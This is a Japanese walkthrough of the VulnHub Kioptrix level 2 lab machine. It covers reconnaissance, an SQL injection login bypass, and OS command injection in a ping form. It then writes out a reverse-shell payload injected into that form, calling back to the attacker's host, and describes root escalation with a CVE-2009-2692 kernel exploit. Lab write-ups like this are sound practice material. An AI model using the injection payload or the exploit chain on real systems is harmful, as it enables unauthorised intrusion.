【VulnHub】kioptrix level2 walkthrough
VulnHubのkioptrix level2を実施
初期偵察
・nmapでIPアドレスを特定
IPアドレスは192.168.100.108
・公開されているポートを確認
以下の情報が得られる
- 公開ポートは22,80,111,443,631,773,3306(mysql)
- Cent OS
- Apache2.0.52
- OpenSSH 3.9p1
・Webページにアクセスするとログイン画面が表示される
・初歩的なSQLインジェクションを試みる
でログイン出来る
※VMを再起動したため途中から192.168.100.109にIPが変更されています。
Pingを試みたいIPアドレスを入力する画面が表示されるのでIPアドレスを入れてみる
Ping結果が出力された。
・OSコマンドインジェクションを試してみる
ping結果とともに/etc/passwdの結果が表示されたのでOSコマンドインジェクションの脆弱性があるためこれを利用したい
侵入
・nmap版 netcat(ncat)をインストール
Kali linux側でローカルの5555ポートで待ち受けるように実行
※標準のncでも可能でした
・Webの入力フォームに以下のように入力しリバースシェルを確立
192.168.100.102; bash -i >& /dev/tcp/192.168.100.110/5555 0>&1
※192.168.100.110はKali LinuxのIPアドレス
・apacheユーザでログイン成功
侵入は完了したので特権を奪取する必要がある
特権昇格
・侵入できたのでLinux kernelのバージョンを確認する
2.6.9-55であることがわかるのでこれに刺さるexploitを検索
上記のexploitがヒット
CVE-2009-2692(Linux Kernelのsock_sendpage関数の脆弱性)をついたexploitであった
・exploitを使用
いったんソースをkali linux側にダウンロードし、さらにwgetでターゲットで取得
コンパイルしたファイルを実行するとrootへ権限昇格成功
今回も/root配下にflagはなかった